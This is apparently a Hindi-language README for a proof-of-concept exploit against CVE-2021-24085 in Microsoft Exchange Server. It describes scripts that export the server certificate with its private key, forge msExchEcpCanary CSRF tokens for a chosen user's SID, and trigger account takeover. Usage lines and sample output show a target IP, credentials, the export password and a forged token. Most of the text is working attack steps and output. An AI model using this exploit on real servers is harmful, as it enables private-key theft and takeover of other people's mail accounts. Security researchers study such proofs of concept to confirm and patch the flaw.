
CVE-2021-24085 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: msExchEcpCanary टोकन जालसाजी के माध्यम से Microsoft Exchange Server में CSRF-आधारित विशेषाधिकार उन्नयन, जिससे खाता अधिग्रहण संभव होता है।
यह CVE-2021-24085 के लिए एक प्रूफ ऑफ कॉन्सेप्ट है।
poc.py लक्ष्य का सर्टिफिकेट फ़ाइल अंदर निजी कुंजी के साथ डाउनलोड करता हैYellowCanary SID के आधार पर किसी विशिष्ट उपयोगकर्ता के लिए msExchEcpCanary csrf टोकन उत्पन्न करता हैpoc.js खाता अधिग्रहण को ट्रिगर करने के लिए csrf शोषण हैमैंने malicifest.xml फ़ाइल प्रदान नहीं की है, लेकिन आप नीचे संदर्भ अनुभाग में उपलब्ध संसाधनों से एक दुर्भावनापूर्ण मेनिफेस्ट फ़ाइल कैसे उत्पन्न करें, इसकी जानकारी पा सकते हैं।
अंदर निजी कुंजी के साथ सर्टिफिकेट तक पहुंचें:
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###
researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax
अब आप लक्ष्य उपयोगकर्ता के SID का उपयोग करके YellowCanary के साथ csrf टोकन उत्पन्न कर सकते हैं:
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax
#====================================================
# YellowCanary - generate msExchEcpCanary csrf tokens
#====================================================
security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.